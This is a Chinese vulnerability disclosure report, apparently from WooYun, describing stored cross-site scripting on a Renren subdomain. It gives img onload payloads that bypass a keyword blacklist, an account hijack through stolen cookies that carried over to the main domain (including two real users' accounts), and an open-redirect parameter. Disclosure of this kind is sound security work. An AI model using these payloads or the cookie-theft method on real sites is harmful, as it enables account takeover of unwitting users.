盛水的木桶是由许多块木板箍成的,盛水量也是由这些木板共同决定的。若其中一块木板很短,则此木桶的盛水量就被短板所限制。这块短板就成了这个木桶盛水量的“限制因素”(或称“短板效应”)。若要使此木桶盛水量增加,只有换掉短板或将短板加长才成。人们把这一规律总结为“木桶原理”,或“木桶定律”,又称“短板理论”。

--摘自百度君

详细说明:站点:

此站虽说有针对用户的输入过滤,但是仍可以绕过。

多处存储跨站,可致账号被劫持 

漏洞证明:1·名称、资料、爱好处可绕过限制跨站

人人网分站漏洞战火燃烧至主站(利用cookies设计问题)

2·资料爱好

人人网分站漏洞战火燃烧至主站(利用cookies设计问题)

只要访问主页即可命中

不过,这里做了一些限制,过滤器过滤 script /onerror 等关键字,并且有字符数200的限制!

于是构造

IE

<img src="" onload="document.getElementsByTagName('script')[2].src=''">

chrome

<img src="" onload="var script=document.createElement('SCRIPT');script.setAttribute('src','');document.getElementsByTagName('head')[0].appendChild(script);">

绕过了此黑名单过滤器

截取的cookie:

人人网分站漏洞战火燃烧至主站(利用cookies设计问题)

可见人气还是很旺呐……

由此yujian.renren.com 的域,顺利进入到renren.com的域,至此主站被沦陷。

劫持2个妹子账号:



人人网分站漏洞战火燃烧至主站(利用cookies设计问题)


人人网分站漏洞战火燃烧至主站(利用cookies设计问题)


过年了再送个URL跳转:?mainPage=http://wooyun.org

你们是不是也意思意思-0- 

 

修复方案:

白名单可能更好些